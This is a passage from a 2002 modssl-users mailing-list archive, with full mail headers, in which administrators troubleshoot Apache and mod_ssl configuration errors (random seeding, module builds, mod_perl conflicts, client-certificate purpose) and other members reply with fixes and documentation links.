      DocumentRoot /kit
      ServerName www.my.server.name
      ErrorLog logs/log1
      #SSLRandomFile file /dev/egd-pool 1024
      SSLRandomSeed startup egd:/var/run/egd-pool
      SSLRandomSeed connect egd:/var/run/egd-pool
      SSLCertificateFile /usr/local/ssl/certs/cert.cer
      SSLCertificateKeyFile /usr/local/ssl/bin/private.key


and it throws following Error:
# ./apachectl startssl
Syntax error on line 983 of /kit/conf/httpd.conf:
SSLRandomSeed cannot occur within  section
./apachectl startssl: httpd could not be started
#





>From: Lutz Jaenicke 
>Reply-To: modssl-users@modssl.org
>To: modssl-users@modssl.org
>Subject: Re: SSLRandomFIle Error (Apache-mod_ssl)
>Date: Fri, 15 Nov 2002 22:17:31 +0100
>
>On Fri, Nov 15, 2002 at 09:11:48PM +0000, Manoj Kithany wrote:
> > Hi:
> >
> > I think I have Apache + mod_ssl on my IBM AIX box.
> >
> > My httpd.conf file contains:
> > -----------------------------------------------------------
> > 
> >   ServerAdmin manojkithany108@hotmail.com
> >   DocumentRoot /kit
> >   ServerName www.my.server.name
> >   ErrorLog logs/log1
> >   SSLRandomFile file /dev/egd-pool 1024
> >   SSLCertificateFile /usr/local/ssl/certs/cert.cer
> >   SSLCertificateKeyFile /usr/local/ssl/bin/private.key
> > 
> > -----------------------------------------------------------
> > When I RUN my Apache, I get following Error:
> > -----------------------------------------------------------
> > # ./apachectl startssl
> > Syntax error on line 980 of /kit/conf/httpd.conf:
> > Invalid command 'SSLRandomFile', perhaps mis-spelled or defined by a 
>module
> > not included in the server configuration
> > ./apachectl startssl: httpd could not be started
> > -----------------------------------------------------------
> >
> > Do you know what is the problem? I read the documentation regarding the
> > above since my IBM AIX Box does NOT have /dev/random
>
>But you didn't read carefully enough. If you are using an EGD style device,
>you must explicitely tell:
>SSLRandomSeed startup egd:/var/run/egd-pool
>SSLRandomSeed connect egd:/var/run/egd-pool



_________________________________________________________________
Tired of spam? Get advanced junk mail protection with MSN 8. 
http://join.msn.com/?page=features/junkmail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 23:36:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA01739; Fri, 15 Nov 2002 23:35:24 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id XAA01682; Fri, 15 Nov 2002 23:34:21 +0100 (MET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id RAA18290;
	Fri, 15 Nov 2002 17:34:00 -0500
Date: Fri, 15 Nov 2002 17:33:59 -0500 (EST)
From: "R. DuFresne" 
To: Manoj Kithany 
cc: modssl-users@modssl.org
Subject: Re: SSLRandomFIle Error (Apache-mod_ssl)
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 15 Nov 2002, Manoj Kithany wrote:

> Thanks Lutz:
> 
> Where to put SSLRandomSeed....? Becos I put it in Virtual Host as shown:
> 
>       ServerAdmin manojkithany108@hotmail.com
>       DocumentRoot /kit
>       ServerName www.my.server.name
>       ErrorLog logs/log1
>       #SSLRandomFile file /dev/egd-pool 1024
>       SSLRandomSeed startup egd:/var/run/egd-pool
>       SSLRandomSeed connect egd:/var/run/egd-pool
>       SSLCertificateFile /usr/local/ssl/certs/cert.cer
>       SSLCertificateKeyFile /usr/local/ssl/bin/private.key
> 
> 
> and it throws following Error:
> # ./apachectl startssl
> Syntax error on line 983 of /kit/conf/httpd.conf:
> SSLRandomSeed cannot occur within  section
> ./apachectl startssl: httpd could not be started
> #

The clue here is clearly stated:  SSLRandomSeed cannot occur within
 section, move the SSLRandomSeed directives higher up in the
conf file, before the VirtualHost sections.  Perhaps more directly under
the  or prior to that.

Thanks,

Ron DuFresne

> 
> 
> 
> 
> 
> >From: Lutz Jaenicke 
> >Reply-To: modssl-users@modssl.org
> >To: modssl-users@modssl.org
> >Subject: Re: SSLRandomFIle Error (Apache-mod_ssl)
> >Date: Fri, 15 Nov 2002 22:17:31 +0100
> >
> >On Fri, Nov 15, 2002 at 09:11:48PM +0000, Manoj Kithany wrote:
> > > Hi:
> > >
> > > I think I have Apache + mod_ssl on my IBM AIX box.
> > >
> > > My httpd.conf file contains:
> > > -----------------------------------------------------------
> > > 
> > >   ServerAdmin manojkithany108@hotmail.com
> > >   DocumentRoot /kit
> > >   ServerName www.my.server.name
> > >   ErrorLog logs/log1
> > >   SSLRandomFile file /dev/egd-pool 1024
> > >   SSLCertificateFile /usr/local/ssl/certs/cert.cer
> > >   SSLCertificateKeyFile /usr/local/ssl/bin/private.key
> > > 
> > > -----------------------------------------------------------
> > > When I RUN my Apache, I get following Error:
> > > -----------------------------------------------------------
> > > # ./apachectl startssl
> > > Syntax error on line 980 of /kit/conf/httpd.conf:
> > > Invalid command 'SSLRandomFile', perhaps mis-spelled or defined by a 
> >module
> > > not included in the server configuration
> > > ./apachectl startssl: httpd could not be started
> > > -----------------------------------------------------------
> > >
> > > Do you know what is the problem? I read the documentation regarding the
> > > above since my IBM AIX Box does NOT have /dev/random
> >
> >But you didn't read carefully enough. If you are using an EGD style device,
> >you must explicitely tell:
> >SSLRandomSeed startup egd:/var/run/egd-pool
> >SSLRandomSeed connect egd:/var/run/egd-pool
> 
> 
> 
> _________________________________________________________________
> Tired of spam? Get advanced junk mail protection with MSN 8. 
> http://join.msn.com/?page=features/junkmail
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 23:51:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA02683; Fri, 15 Nov 2002 23:50:44 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id XAA02666; Fri, 15 Nov 2002 23:49:25 +0100 (MET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Fri, 15 Nov 2002 14:49:18 -0800
Received: from 168.179.102.67 by sea1fd.sea1.hotmail.msn.com with HTTP;
	Fri, 15 Nov 2002 22:49:18 GMT
X-Originating-IP: [168.179.102.67]
From: "Manoj Kithany" 
To: modssl-users@modssl.org
Subject: OpenSSL Error (Apache-mod_ssl)
Date: Fri, 15 Nov 2002 22:49:18 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 15 Nov 2002 22:49:18.0844 (UTC) FILETIME=[3B3DB3C0:01C28CF9]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Manoj Kithany" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi:

My Apache is NOT working.....the log file shows:
--------------------------------------------------------------------
[Fri Nov 15 15:35:57 2002] [error] mod_ssl: Init: Failed to generate 
temporary 512 bit RSA private key (OpenSSL library error follows)
[Fri Nov 15 15:35:57 2002] [error] OpenSSL: error:24064064:random number 
generator:SSLEAY_RAND_BYTES:PRNG not seeded
[Fri Nov 15 15:35:57 2002] [error] OpenSSL: error:04069003:rsa 
routines:RSA_generate_key:BN lib
--------------------------------------------------------------------

I am using Apache 1.3.27, mod_ssl 2.8.11 on IBM AIX 5.1 box.



_________________________________________________________________
The new MSN 8: smart spam protection and 2 months FREE*  
http://join.msn.com/?page=features/junkmail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov 16 08:33:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA18651; Sat, 16 Nov 2002 08:32:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA18626; Sat, 16 Nov 2002 08:31:06 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C18784CED12; Sat, 16 Nov 2002 08:31:03 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8989F286BF; Sat, 16 Nov 2002 08:05:55 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hestia.email.starband.net id WAA29716; Fri, 15 Nov 2002 22:22:59 +0100 (MET)
From: rdkurth@starband.net
Received: from directphp (vsat-148-64-7-192.c050.t7.mrt.starband.net [148.64.7.192])
	by hestia.email.starband.net (8.12.4/8.12.4) with ESMTP id gAFLMeSu032108
	for ; Fri, 15 Nov 2002 16:22:49 -0500
Date: Fri, 15 Nov 2002 13:26:01 -0800
X-Mailer: The Bat! (v1.53d) Personal
X-Priority: 3 (Normal)
Message-ID: <189263812802.20021115132601@starband.net>
To: modssl-users@modssl.org
Subject: How can I tell if mod_ssl is installed with Apache
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rdkurth@starband.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I configured and installed mod_ssl with Apache but it does not seam to
be working.
When I run the ./httpd -l comand on Apache it does not show that
mod_ssl.c is installed in Apache this is a list of every thing that is
in there. Should it be in there?
 http_core.c
  mod_env.c
  mod_log_config.c
  mod_mime.c
  mod_negotiation.c
  mod_status.c
  mod_include.c
  mod_autoindex.c
  mod_dir.c
  mod_cgi.c
  mod_asis.c
  mod_imap.c
  mod_actions.c
  mod_userdir.c
  mod_alias.c
  mod_access.c
  mod_auth.c
  mod_so.c
  mod_setenvif.c

  This is how I configured and installed mod_ssl

  1. cd to mod_ssl directory
  2. ran this comand
    ./configure --with-apache=../apache --with-ssl=../openssl
    --prefix=/home/.autoserv/apache --target=autohttpd --enable-module=rewrite
    --enable-shared=rewrite --enable-module=proxy --enable-shared=proxy
    --sysconfdir=/home/.autoserv/apache/conf
    --htdocsdir=/home/.autoserv/html --cgidir=/home/.autoserv/cgi-bin
    --sysconfdir=/home/.autoserv/conf --enable-module=ssl --enable-shared=ssl
  3. cd ../apache
  4. make
  5. make certificate
  6. make install
  

-- 
Best regards,
 rdkurth                          mailto:rdkurth@starband.net
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov 16 08:33:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA18659; Sat, 16 Nov 2002 08:32:23 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA18628; Sat, 16 Nov 2002 08:31:07 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DB2B44CED28; Sat, 16 Nov 2002 08:31:03 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C9219287A7; Sat, 16 Nov 2002 08:06:01 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hoemail2.firewall.lucent.com id WAA29951; Fri, 15 Nov 2002 22:33:16 +0100 (MET)
Received: from il0015exch001h.wins.lucent.com (h135-1-23-83.lucent.com [135.1.23.83])
	by hoemail2.firewall.lucent.com (Switch-2.2.2/Switch-2.2.0) with ESMTP id gAFLX8R06572
	for ; Fri, 15 Nov 2002 16:33:08 -0500 (EST)
Received: by il0015exch001h.ih.lucent.com with Internet Mail Service (5.5.2653.19)
	id ; Fri, 15 Nov 2002 15:33:08 -0600
Message-ID: 
From: "Mitchel, Jennifer (Jem)" 
To: "'modperl@perl.apache.org'" ,
        "'modssl-users@modssl.org'" 
Cc: "'morrie@lucent.com'" 
Subject: please help... mod_ssl seems to overwrite mod_perl and mod_perl s
	eems to overwrite mod_ssl 
Date: Fri, 15 Nov 2002 15:33:07 -0600
Importance: high
X-Priority: 1
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mitchel, Jennifer (Jem)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all,

  How do I get  BOTH mod_perl and mod_ssl built into and working in Apache?

  I had mod_perl successfully built into my apache to use Authentication hook.

  Then I added mod_ssl in and I started to get errors from my .htaccess file

   Error:
   [Fri Nov 15 14:39:03 2002] [alert] [client 135.2.60.152]  /web/content/askLucent/password-reset/cgi-bin/.htaccess: Invalid command 'PerlSetVar', perhaps mis-spelled or defined by a module not included in the server configuration

 
  Contents of .htaccess

AuthName "NT Domain\Login and Password"
AuthType Basic
#PerlSetVar NT_Controllers 'na02il0015dc00:na02il0015dc01'
PerlSetVar NT_Controllers 'na02il0015dc04:na02il0015dc01:NA02IL0015DC02'
PerlAuthenHandler Apache::AuthenN2
require valid-user


 so i rebuilt mod_perl back into apache and now I get errors of directives from mod_ssl in my httpd.conf file

  Error:
  5e-cts root: /web/server/apache/1.3.22/bin/apachectl stop ; /web/server/apache/1.3.22/bin/apachectl start
/web/server/apache/1.3.22/bin/apachectl stop: httpd (no pid file) not running
Syntax error on line 1008 of /web/server/apache/1.3.22/conf/httpd.conf:
Invalid command 'SSLRandomSeed', perhaps mis-spelled or defined by a module not included in the server configuration
/web/server/apache/1.3.22/bin/apachectl start: httpd could not be started


 Lines from httpd.conf:
  
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLRandomSeed startup file:/dev/random  512
SSLRandomSeed connect file:/dev/random  512

 I need to use both mod_perl and mod_ssl and it seems like keeps overwriting the other.  How do I change this so I can get them built in together?

Thank you
Jem
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov 16 09:17:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA21038; Sat, 16 Nov 2002 09:16:12 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id JAA21020; Sat, 16 Nov 2002 09:15:06 +0100 (MET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id DAA20122;
	Sat, 16 Nov 2002 03:14:47 -0500
Date: Sat, 16 Nov 2002 03:14:47 -0500 (EST)
From: "R. DuFresne" 
To: rdkurth@starband.net
cc: modssl-users@modssl.org
Subject: Re: How can I tell if mod_ssl is installed with Apache
In-Reply-To: <189263812802.20021115132601@starband.net>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


These directives:  --enable-module=ssl --enable-shared=ssl, made mod-ssl
as a loadable module, it's not part of apache's core binary, so look in 
//libexec/ for the mdoule you built to load on the httpd.conf
file;  libssl.so.  Additionally, I suggest you read through all the
documentation as well, you are mising things like this which are clearly
defined there.  This is seen also in the fact you issued these directive
as well as the ones stated below in the wrong place:

--enable-module=rewrite>     --enable-shared=rewrite --enable-module=proxy
--enable-shared=proxy
>     --sysconfdir=/home/.autoserv/apache/conf
>     --htdocsdir=/home/.autoserv/html --cgidir=/home/.autoserv/cgi-bin
>     --sysconfdir=/home/.autoserv/conf --enable-module=ssl
--enable-shared=ssl


Thanks,

Ron DuFresne

On Fri, 15 Nov 2002 rdkurth@starband.net wrote:

> I configured and installed mod_ssl with Apache but it does not seam to
> be working.
> When I run the ./httpd -l comand on Apache it does not show that
> mod_ssl.c is installed in Apache this is a list of every thing that is
> in there. Should it be in there?
>  http_core.c
>   mod_env.c
>   mod_log_config.c
>   mod_mime.c
>   mod_negotiation.c
>   mod_status.c
>   mod_include.c
>   mod_autoindex.c
>   mod_dir.c
>   mod_cgi.c
>   mod_asis.c
>   mod_imap.c
>   mod_actions.c
>   mod_userdir.c
>   mod_alias.c
>   mod_access.c
>   mod_auth.c
>   mod_so.c
>   mod_setenvif.c
> 
>   This is how I configured and installed mod_ssl
> 
>   1. cd to mod_ssl directory
>   2. ran this comand
>     ./configure --with-apache=../apache --with-ssl=../openssl
>     --prefix=/home/.autoserv/apache --target=autohttpd --enable-module=rewrite
>     --enable-shared=rewrite --enable-module=proxy --enable-shared=proxy
>     --sysconfdir=/home/.autoserv/apache/conf
>     --htdocsdir=/home/.autoserv/html --cgidir=/home/.autoserv/cgi-bin
>     --sysconfdir=/home/.autoserv/conf --enable-module=ssl --enable-shared=ssl
>   3. cd ../apache
>   4. make
>   5. make certificate
>   6. make install
>   
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov 16 11:54:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA25537; Sat, 16 Nov 2002 11:53:27 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA25528; Sat, 16 Nov 2002 11:52:31 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E01D24CE6E2; Sat, 16 Nov 2002 11:52:30 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 399CA2874C; Sat, 16 Nov 2002 11:21:42 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.logilune.com id JAA21729; Sat, 16 Nov 2002 09:38:11 +0100 (MET)
Received: from stason.org (mail.logilune.com [195.154.174.36])
	by mail.logilune.com (Postfix) with ESMTP
	id DB4617AC8C; Sat, 16 Nov 2002 09:38:00 +0100 (CET)
Message-ID: <3DD9E8EF.4030603@stason.org>
Date: Tue, 19 Nov 2002 15:31:59 +0800
From: Stas Bekman 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: "Mitchel, Jennifer (Jem)" 
Cc: "'modssl-users@modssl.org'" ,
        "'openssl-users@openssl.org'" ,
        "'modperl@perl.apache.org'" ,
        "'morrie@lucent.com'" 
Subject: Re: Hellp! mod_perl worked fine then added modssl and now apache
 won'	t start
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Stas Bekman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Mitchel, Jennifer (Jem) wrote:
> Hi all,
> 
>   I am still new to all of this.
> 
>   I had Apache 1.3.22 with mod_perl included and the Authenitcation hook enabled.  Everything was fine.
> 
>   Then I imstalled my OpenSSL and generated my key, got my server certificate from my csr etc fine.  The certificate has been verified.  
> 
>   I then with mod_ssl-2.8.5-1.3.22
>   did 	./configure \
>  	--with-apache=/web/server/apache/1.3.22-source \
> 	--with-ssl=/web/server/OpenSSL/0.9.6g \
> 	--with-crt=/web/server/OpenSSL/0.9.6g/bin/serverPEM.crt \
> 	--with-key=/web/server/OpenSSL/0.9.6g/bin/server.key \
> 	--prefix=/=/web/server/apache/1.3.22
> 
>   This went fine. make went fine.  Because I used with-crt/with-key I skipped make certificate (yes serverPEM.crt and server.key are the real certificate and private key)
> 
>   make install goes fine.
> 
>   I stop Apache fine.
>   Once start I get the following error
> 
>   Syntax error on line 1008 of /web/server/apache/1.3.22/conf/httpd.conf:
> Invalid command 'PerlModule', perhaps mis-spelled or defined by a module not included in the server configuration
> /web/server/apache/1.3.22/bin/apachectl start: httpd could not be started

Please review:
http://perl.apache.org/docs/1.0/guide/install.html#mod_perl_and_mod_ssl___openssl_

-- 


_____________________________________________________________________
Stas Bekman             JAm_pH      --   Just Another mod_perl Hacker
http://stason.org/      mod_perl Guide   http://perl.apache.org/guide
mailto:stas@stason.org  http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Nov 17 16:11:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA01936; Sun, 17 Nov 2002 16:10:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from galileo.fis.unipr.it id QAA01921; Sun, 17 Nov 2002 16:09:17 +0100 (MET)
Received: from pr.infn.it (argo.pr.infn.it [192.135.11.6])
	by galileo.fis.unipr.it (8.11.6/8.11.6) with ESMTP id gAHF9B927680;
	Sun, 17 Nov 2002 16:09:11 +0100
Message-ID: <3DD7B116.2080407@pr.infn.it>
Date: Sun, 17 Nov 2002 16:09:10 +0100
From: Fabio Spataro 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: unsupported certificate purpose
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Fabio Spataro 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all,
I'm setting up an https server with apache-1.3.22+mod_ssl-2.8.5+php-4.1.2.
Since I have to check the client certificate at php level I put this line
in httpd.conf:

SSLVerifyClient require

The client certificate has been created with this extension:

nsCertType = server

At client side I'm testing the application with this command:

wget --sslcertfile= --sslcertkey= 

This is the error I get:

Unable to establish SSL connection.

This is the apache error_log I get:

[error] mod_ssl: Certificate Verification: Error (26): unsupported
certificate purpose

Is there a way to configure the required client certificate purpose?


Fabio Spataro

ps.
I can solve the problem putting these lines in
mod_ssl-2.8.5-1.3.22/pkg.sslmod/ssl_engine_init.c

    /*
     *  Configure CTX purpose
     */
    SSL_CTX_set_purpose(ctx, X509_PURPOSE_ANY);

just before

    /*
     * Configure Client Authentication details
     */

and rebuilding mod_ssl.

Is there a cleaner way?


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 18 07:06:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA21588; Mon, 18 Nov 2002 07:05:21 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id HAA21580; Mon, 18 Nov 2002 07:05:01 +0100 (MET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Sun, 17 Nov 2002 22:04:54 -0800
X-Originating-IP: [203.116.243.1]
From: "Xeruz at Hotmail" 
To: 
Subject: mod-ssl for apache 2.0.x - wasn't compiled
Date: Mon, 18 Nov 2002 14:11:47 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="windows-874"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
Message-ID: 
X-OriginalArrivalTime: 18 Nov 2002 06:04:54.0570 (UTC) FILETIME=[6A2C80A0:01C28EC8]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Xeruz at Hotmail" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi There,


[Situation]
I'm trying to compile and run "mod-ssl" on Apache-2.0.39 but I couldn't find
useful document after searching the web. Thus, I followed the mod-ssl
document for Apache-1.3.x but it didn't work. What I did was :

$ ./configure \
              --with-apache=../apache_1.3.x \
              --with-ssl=../openssl-0.9.x \
              --with-mm=../mm-1.1.x \
              --with-crt=/path/to/your/server.crt \
              --with-key=/path/to/your/server.key \
              --prefix=/path/to/apache \
              --enable-shared=ssl
$ make
$ make install

After the compilation, I couldn't find any "mod_ssl.o" (openssl's libssl.so
was there).
I also checked with :

$ httpd -l

but mod_ssl.c was not in the list.

[Questions]
1. Where can I explore further about mod_ssl on Apache-2.0.x ? Any link?
2. Where can I download mod_ssl for Apache-2.0.39? (In case, the default
"ssl" module in Apache 2.0.39 is not recommended.)

Thanks a lot for your time!



Best Regards,
Jirat.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 18 07:46:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA22549; Mon, 18 Nov 2002 07:45:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from toftum.dk id HAA22488; Mon, 18 Nov 2002 07:44:48 +0100 (MET)
Received: by toftum.dk (Postfix, from userid 1001)
	id B9B146E402C; Mon, 18 Nov 2002 07:46:53 +0100 (CET)
Date: Mon, 18 Nov 2002 07:46:53 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mod-ssl for apache 2.0.x - wasn't compiled
Message-ID: <20021118064653.GB23373@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, Nov 18, 2002 at 02:11:47PM +0800, Xeruz at Hotmail wrote:
> [Questions]
> 1. Where can I explore further about mod_ssl on Apache-2.0.x ? Any link?

httpd.apache.org/docs-2.0/
www.modssl.org/support/ (which has links to the archive of this list).

> 2. Where can I download mod_ssl for Apache-2.0.39? (In case, the default
> "ssl" module in Apache 2.0.39 is not recommended.)

You should be using 2.0.43 - but other than that, what comes with apache
should be just fine. The options from 1.3 won't work, but running
./configure --help in the 2.0 source tree will give you a list of the
options that you need.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 18 08:04:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA22939; Mon, 18 Nov 2002 08:03:27 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id IAA22932; Mon, 18 Nov 2002 08:02:55 +0100 (MET)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 216BD2BB46; Sun, 17 Nov 2002 22:54:49 -0800 (PST)
Date: Sun, 17 Nov 2002 22:54:49 -0800
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: mod-ssl for apache 2.0.x - wasn't compiled
Message-ID: <20021118065448.GA8823@rawbyte.com>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



> [Questions]
> 1. Where can I explore further about mod_ssl on Apache-2.0.x ? Any link?

I have a detailed chapter online just on that :
http://www.apacheworld.org/ty24/

